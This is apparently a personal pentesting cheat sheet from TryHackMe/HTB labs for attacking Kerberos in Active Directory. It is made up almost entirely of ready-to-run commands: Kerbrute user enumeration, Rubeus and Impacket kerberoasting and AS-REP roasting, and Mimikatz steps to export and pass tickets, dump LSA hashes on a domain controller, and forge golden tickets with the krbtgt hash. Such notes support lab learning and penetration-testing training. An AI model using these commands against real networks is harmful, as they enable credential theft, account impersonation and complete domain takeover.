Kerberos
You can use Kerbrute to enumerate accounts without ever having to exploit a machine:
kerbrute userenum --dc [IP] -d CONTROLLER.local /home/kali/Documents/TryHackMe/Labs/Attacking_Kerberos/User.txt
-Note you will need to add an entry to your /etc/hosts file.
Rubeus (local)
https://github.com/GhostPack/Rubeus
Rubeus.exe harvest /interval:30- to harvest ticketsrubeus.exe kerberoast- to get hashes of kerberoastable accounts. Use bloodhound to see if they are worth anything.Rubeus.exe asreproast- can be cracked with hashcat
- YOU MAY NEED TO ADD 23$ TO THE HASH!! PAY ATTENTION TO THE FORMAT!!!
Impacket (remote)
Impacket-GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip [IP] -request
Bash script: for user in $(cat users.txt); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 $domain/${user} | grep -v Impacket; done
- where $domain is just the htb of htb.local
Mimikatz
- Can be used to dump creds, but it can also be used to gain Domain Admin tickets and impersonate them. Obviously great for privesc.
- Steps:
mimikatz.exeprivilege::debug- if you run and don’t get 20, it won’t worksekurlsa::tickets /export- to export tickets on machine.- we can impersonate the ticket. Recommend using an admin ticket…duh kerberos::ptt $ticket
lsadump::lsa /patch- If you are on a DC you can dump the hasheslsadump::lsa /inject /name:krbtgt- can also create a golden ticket on a DC:- kerberos::golden /user: /domain: /sid: /krbtgt: /id:
- you can access any machine in the domain
misc::cmd\\MACHINE1 cmd.exe